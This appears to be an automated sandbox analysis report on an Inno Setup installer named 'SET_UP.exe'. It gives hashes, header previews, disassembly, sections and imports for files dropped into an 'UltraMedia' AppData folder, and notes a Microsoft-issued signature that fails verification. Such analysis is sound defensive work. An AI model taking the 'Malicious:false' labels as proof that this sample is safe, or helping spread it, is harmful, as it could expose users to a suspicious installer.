                                                                                                                                          SHA-512:876B82534764B2D156CE64D52771D38F245D330957287773F6B2360F48564B8D4A304449FA6F6400052165AAF433A191AF2D3B38B194A9B1E892552DC0805FBA
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...f..V.................H...@......<c.......p.....Y.................................l...................................O......._......D<...............L...P...A...........@..$...................................l...x............................text....C.......D.................. ..`.itext..D....`.......H.............. ..`.data...t....p.......L..............@....bss....H............Z...................idata..._.......`...Z..............@....edata...O.......P..................@..@.rdata..$....@......................@..@.reloc...A...P...B..................@..B.rsrc...D<.......>...N..............@..@.....................R..............@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\madbasic_.bpl (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):197632
                                                                                                                                          Entropy (8bit):6.7840768813314964
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:yN/kGQxE6qeM/k4qTl5L5e5+53WCG1CnTeFmf:VqeM/k4qR5L5e5+53WKiE
                                                                                                                                          MD5:09C311CE669A6BBD40B4D27FBB6F249E
                                                                                                                                          SHA1:7714EB60EFE0C0ACE52681B11AC4EE80488BB796
                                                                                                                                          SHA-256:AD9B4441C680A9691259668A0685429CBFDA55D4C19DB8230C52283EEB752743
                                                                                                                                          SHA-512:19825B164A64754778C2A83463164BD533B68A77CA62CB271074E92D7ED759657CDC12187EC1DBEF700143765FE74ADCABAB5D1BCE5C3211B470246689DFF73A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.............................0.......@.....W.................................................................0...d......`(......x.......................................".......................................0............................text...x........................... ..`.itext.......0...................... ..`.data...l&...@...(..................@....bss........p.......@...................idata..`(.......*...@..............@....edata...d...0...f...j..............@..@.rdata.."...........................@..@.reloc..............................@..B.rsrc...x...........................@..@....................................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\maddisAsm_.bpl (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66056
                                                                                                                                          Entropy (8bit):6.89541527402873
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:eNy3eqMne0sXB0IWtCLwEJhY0w1FwbiD7wlwei7:CqMnfIB04LwEJhY0w1UTnE
                                                                                                                                          MD5:11EFAB4068CB4058207959E2638C2C1A
                                                                                                                                          SHA1:B1EAC0879DCDA14BDC0C2EFD7F261D7C175208C3
                                                                                                                                          SHA-256:11E3568F497C40331EE4A9E9973967E61B224E19204E09ED7451DA3B74BD2FF5
                                                                                                                                          SHA-512:CED6167612674232429C25E52BA051994B09FDAEAF3316505904456EF8D7063F2EB03B5A158F0A424F0ECB49673E6A3D6B57D61183C5F8402DA3FE53AF0BD185
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.................z...8......4..............W......................... ......|>..................................&.......d........................L......T...............#....................................................................text...4w.......x.................. ..`.itext..<............|.............. ..`.data................~..............@....bss.....................................idata..d...........................@....edata..&...........................@..@.rdata..#...........................@..@.reloc..T...........................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\madexcept_.bpl (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):448520
                                                                                                                                          Entropy (8bit):6.746694731944354
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:XlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2lZ:XlG4ut30F8slzYlQcW/jd++2nJ6u2lZ
                                                                                                                                          MD5:562EC96D0F65B0309AD7508D0E0CED11
                                                                                                                                          SHA1:0FE9DDA664F4F8D9AE18603C5A25756710032A6F
                                                                                                                                          SHA-256:FB64A5954B726D2D0F0BC26113A36DC8A86C469AF994CEEAF2E2609743A0A557
                                                                                                                                          SHA-512:876B82534764B2D156CE64D52771D38F245D330957287773F6B2360F48564B8D4A304449FA6F6400052165AAF433A191AF2D3B38B194A9B1E892552DC0805FBA
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...f..V.................H...@......<c.......p.....Y.................................l...................................O......._......D<...............L...P...A...........@..$...................................l...x............................text....C.......D.................. ..`.itext..D....`.......H.............. ..`.data...t....p.......L..............@....bss....H............Z...................idata..._.......`...Z..............@....edata...O.......P..................@..@.rdata..$....@......................@..@.reloc...A...P...B..................@..B.rsrc...D<.......>...N..............@..@.....................R..............@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\rtl120.bpl (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1114632
                                                                                                                                          Entropy (8bit):6.835959006752849
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:0bhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo9:b2hTKgbo9
                                                                                                                                          MD5:E71E48E31AC728A6DE7C020645F0C32F
                                                                                                                                          SHA1:7F86EADD1B7A0AB87B7CE7C2029BDEF3D6FE1D8D
                                                                                                                                          SHA-256:40A1D1A2F276738F568700DDCCAC99CDCD35B973FC8BE86AB826C0D1ABC9D6FF
                                                                                                                                          SHA-512:5E41DBE7EFAC8A042A14C2F976D1AFCD45E3F7531FB60DAAB61AC17FFD339D34E1C6746FCE9E4B591B026598A89E38F36C6D24E33E2DE0B39D81806259F9BE2A
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H...........................................P.........................`.................................................X$...p...................L..............................................................x............................text.............................. ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@.......(...................idata..X$.......&...(..............@....edata...............N..............@..@.rdata...............0..............@..@.reloc...............2..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\sputnik.bmp (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6557262
                                                                                                                                          Entropy (8bit):7.976170515806142
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:hjt9oE685wwEVri3xKkTNU7O22do+wn/W2MFXxL8meovJoWl6R7RIoiaTqfNnObu:J3o5VQ5COXdodn/+XhvvJoHZOFZVaV0
                                                                                                                                          MD5:88E1EDD6CE0B044711CE803670E81C74
                                                                                                                                          SHA1:1F19D8EA4EDED28E92454C833BD284F6BCB5279B
                                                                                                                                          SHA-256:F7C7472065564F2C81168AB687FCBB59A3E8C8E16E826C3772911D17D86F8CB9
                                                                                                                                          SHA-512:A1D06669DA35BF6075E142A9BD0CBEF7435DA5CAA48921A48AE30D3C84C8D4CFF4C52851B1C8F3E3C40B1C41932E3A6F043632BBEB4667847EFF5675EF9B751A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..C...h.NL.o.MbR..FkCAO...c.q.AC.b...c.Zx..c...wn....y.M_XW....ah.g`..E...imvQ..ByhV^e.fR.G....n..U.ECN....T.fqX.smX.dl.WG..X.V.W.qn.......L.bEVn.jp..K.C....TmH.CUJ...AVe...d.M`..f.wh.D.S.HvO...Ra..f...Eq.k.b..O.V...dsgyI...eMCG..._v.W.A...ZLym.....Zk.hJN....Kux.D..hl..B.aQk...R.X..ml....ZMB.\Q.q...Dxf.k.X...D`.TLlMa..lc.ytP.TJF..K\SaE.K\WY.G....`.f.w..Ck..x..ij.g.y.f...Mplo.upssO.FVs....v.w..\Zr.]x..K..g.....K.H.XY.p...p.gV.F.H.M...^.anm..w.[n..Iu.jxj.JA.r...td..NU.r..nh.e..SSM^bGa.c[P..i.p.WgdXt.KF..Xt.vAAs..o.nO.U..E.ks.ii..l..x.L...jsVM.s.....q.B.p.D...^YG.RO...j..P...BJ.roZ.`j....tP.Q...UWt.S.M\.]A.pFJ.JB.a.u.G.WW..w[......r.hGwT.JHt..aYqS..l.C..M..O.R....i..Ad..Ui..TeDB^...tW...D.[..G\CD.ZWMQ][.yKVd...F._..jn.KIc..L...rho...xJ.[.....u..w..Q.VH.g.X^vg.iS_.IN.a.aU.q..Tq..N...M..A......e....\NS`Fk.....K.Wxs..K.TD..THm...Kc.r....b..Zg..b..jWD.g..I.bIU...j.....qHm.g.qyL.....A.IH.Lc.eOo.OSN.Tl..uL....q.\....e..CG.KmU...h.yo.xy.M.w.fc..]...G...\..Gqa.a.s.dP.V..g_...M_.g..QIh_.V.XLDxQa..

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\vcl120.bpl (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2015240
                                                                                                                                          Entropy (8bit):6.681879780616523
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:v2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6W:vRSf0Ww+NpPSyzYY8c8YEPI4+W
                                                                                                                                          MD5:9A438A75E68E88CDABC13074A17F8A52
                                                                                                                                          SHA1:97C94801D37D249ECE7BA9ACA05703303FD9CF06
                                                                                                                                          SHA-256:CCCCADDE7393F1B624CDE32B38274E60BBE65B1769D614D129BABDAEEF9A6715
                                                                                                                                          SHA-512:19D260505972B96C2E5AE0058A29F61E606E276779A80732DBEE70F9223DBFF51DCB1F5E4EFF19206C300EE08E6060987171F5B83AD87FDD8F797E0E2DB529FC
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................8...............................P...'...`.......................t...L.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):0.3854610057830319
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                          • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                          • Inno Setup installer (109748/4) 1.07%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          File name:SET_UP.exe
                                                                                                                                          File size:74'139'832 bytes
                                                                                                                                          MD5:117c82db1bc3c31c9196bd4a949f3358
                                                                                                                                          SHA1:5ca11fd4cff68324465dc3ea5a4d2c7e5bd2dd4d
                                                                                                                                          SHA256:f155b4c6f26be1e233572d98655e2b997209142a3c01cdc25c389f14f7ff50b3
                                                                                                                                          SHA512:36476e4e827556e9b6356c539c0d6cd8a0118fd74a13ae615bf65b496bfabfeb94230294ebd8adcd775c7c54ffe1e3668737827567c8b086cda11a91111fde3c
                                                                                                                                          SSDEEP:24576:qtdAm9DUV/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5v991RB1en+Tx9i3w+UthDluhP:CqTBtRFk6ek1v991R6ngd+Ute8DMl
                                                                                                                                          TLSH:5DF7391262A1CC32D7321BB5CBD685CC5BA9FD2C1B6194CB3EB45A7C493BAC06934E53
                                                                                                                                          File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:2763431123673f27

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x50156c
                                                                                                                                          Entrypoint Section:.itext
                                                                                                                                          Digitally signed:true
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                                                          Authenticode Signature

                                                                                                                                          Signature Valid:false
                                                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                          Error Number:-2146869232
                                                                                                                                          Not Before, Not After
                                                                                                                                          • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                          Subject Chain
                                                                                                                                          • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                          Version:3
                                                                                                                                          Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                          Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                          Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                          Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          add esp, FFFFFFF0h
                                                                                                                                          push ebx
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          mov eax, 004FEBF4h
                                                                                                                                          call 00007F19251BD2F2h
                                                                                                                                          push FFFFFFECh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov ebx, dword ptr [eax+00000170h]
                                                                                                                                          push ebx
                                                                                                                                          call 00007F19251BE19Dh
                                                                                                                                          and eax, FFFFFF7Fh
                                                                                                                                          push eax
                                                                                                                                          push FFFFFFECh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          push ebx
                                                                                                                                          call 00007F19251BE3F2h
                                                                                                                                          xor eax, eax
                                                                                                                                          push ebp
                                                                                                                                          push 005015E7h
                                                                                                                                          push dword ptr fs:[eax]
                                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                                          push 00000001h
                                                                                                                                          call 00007F19251BDB3Dh
                                                                                                                                          call 00007F19252B2C9Ch
                                                                                                                                          mov eax, dword ptr [004FE82Ch]
                                                                                                                                          push eax
                                                                                                                                          push 004FE890h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          call 00007F1925230731h
                                                                                                                                          call 00007F19252B2CF0h
                                                                                                                                          xor eax, eax
                                                                                                                                          pop edx
                                                                                                                                          pop ecx
                                                                                                                                          pop ecx
                                                                                                                                          mov dword ptr fs:[eax], edx
                                                                                                                                          jmp 00007F19252B593Bh
                                                                                                                                          jmp 00007F19251B8A19h
                                                                                                                                          call 00007F19252B2A6Ch
                                                                                                                                          mov eax, 00000001h
                                                                                                                                          call 00007F19251B94DAh
                                                                                                                                          call 00007F19251B8E5Dh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov edx, 0050177Ch
                                                                                                                                          call 00007F192523023Ch
                                                                                                                                          push 00000005h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov eax, dword ptr [eax+00000170h]
                                                                                                                                          push eax
                                                                                                                                          call 00007F19251BE3B3h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov edx, dword ptr [004D9740h]

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10d0000x3840.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1130000xc4400.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x46b26e80x21d0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x1120000x18.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10da800x88c.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000xfe0840xfe200f64aa552cc32219198e7178b7b1d3bd2False0.48196457667240533data6.478677918483919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .itext0x1000000x17880x1800030d751d7e20e11f863bdb27a950c708False0.5203450520833334data5.94899155660316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x1020000x30680x32002f90c6f68c18651f5b580d5ad2b852e9False0.421796875data4.334644118113417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .bss0x1060000x61940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .idata0x10d0000x38400x3a00e31e730fc86b9dac8932bd3f92752751False0.31041217672413796data5.202469592139362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .tls0x1110000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rdata0x1120000x180x200d6264f4705ad03600aa29f24c89eb799False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0x1130000xc44000xc4400eb4e98f3f35a5eaa0f900a41e20a3b25False0.4319466560509554data6.708002800239729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_CURSOR0x113cd40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                          RT_CURSOR0x113e080x134dataEnglishUnited States0.4642857142857143
                                                                                                                                          RT_CURSOR0x113f3c0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                          RT_CURSOR0x1140700x134dataEnglishUnited States0.38311688311688313
                                                                                                                                          RT_CURSOR0x1141a40x134dataEnglishUnited States0.36038961038961037
                                                                                                                                          RT_CURSOR0x1142d80x134dataEnglishUnited States0.4090909090909091
                                                                                                                                          RT_CURSOR0x11440c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                          RT_BITMAP0x1145400x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                          RT_BITMAP0x114a280xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                          RT_ICON0x114b100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.18098130011539484
                                                                                                                                          RT_ICON0x156b380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.4074293150360819
                                                                                                                                          RT_ICON0x1673600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5627657061880019
                                                                                                                                          RT_ICON0x16b5880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6340248962655601
                                                                                                                                          RT_ICON0x16db300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7647748592870544
                                                                                                                                          RT_ICON0x16ebd80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.8438524590163935
                                                                                                                                          RT_ICON0x16f5600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8404255319148937
                                                                                                                                          RT_STRING0x16f9c80xecdata0.6059322033898306
                                                                                                                                          RT_STRING0x16fab40x250data0.47466216216216217
                                                                                                                                          RT_STRING0x16fd040x28cdata0.4647239263803681
                                                                                                                                          RT_STRING0x16ff900x3e4data0.4347389558232932
                                                                                                                                          RT_STRING0x1703740x9cdata0.717948717948718
                                                                                                                                          RT_STRING0x1704100xe8data0.6293103448275862
                                                                                                                                          RT_STRING0x1704f80x468data0.3820921985815603
                                                                                                                                          RT_STRING0x1709600x38cdata0.3898678414096916
                                                                                                                                          RT_STRING0x170cec0x3dcdata0.39271255060728744
                                                                                                                                          RT_STRING0x1710c80x360data0.37037037037037035
                                                                                                                                          RT_STRING0x1714280x40cdata0.3783783783783784
                                                                                                                                          RT_STRING0x1718340x108data0.5113636363636364
                                                                                                                                          RT_STRING0x17193c0xccdata0.6029411764705882
                                                                                                                                          RT_STRING0x171a080x234data0.5070921985815603
                                                                                                                                          RT_STRING0x171c3c0x3c8data0.3181818181818182
                                                                                                                                          RT_STRING0x1720040x32cdata0.43349753694581283
                                                                                                                                          RT_STRING0x1723300x2a0data0.41964285714285715
                                                                                                                                          RT_RCDATA0x1725d00x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                          RT_RCDATA0x17a8b80x10data1.5
                                                                                                                                          RT_RCDATA0x17a8c80x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                          RT_RCDATA0x17c0c80x6b0data0.6466121495327103
                                                                                                                                          RT_RCDATA0x17c7780x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                          RT_RCDATA0x1822880x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                          RT_RCDATA0x1823b00x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                          RT_RCDATA0x1827540x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                          RT_RCDATA0x182a740x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                          RT_RCDATA0x182d740x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                          RT_RCDATA0x1833500x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                          RT_RCDATA0x1837b40x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                          RT_GROUP_CURSOR0x1858480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                          RT_GROUP_CURSOR0x18585c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                          RT_GROUP_CURSOR0x1858700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1858840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1858980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1858ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1858c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_ICON0x1858d40x68dataEnglishUnited States0.7403846153846154
                                                                                                                                          RT_VERSION0x18593c0x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                          RT_MANIFEST0x185a980x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                          advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                          user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
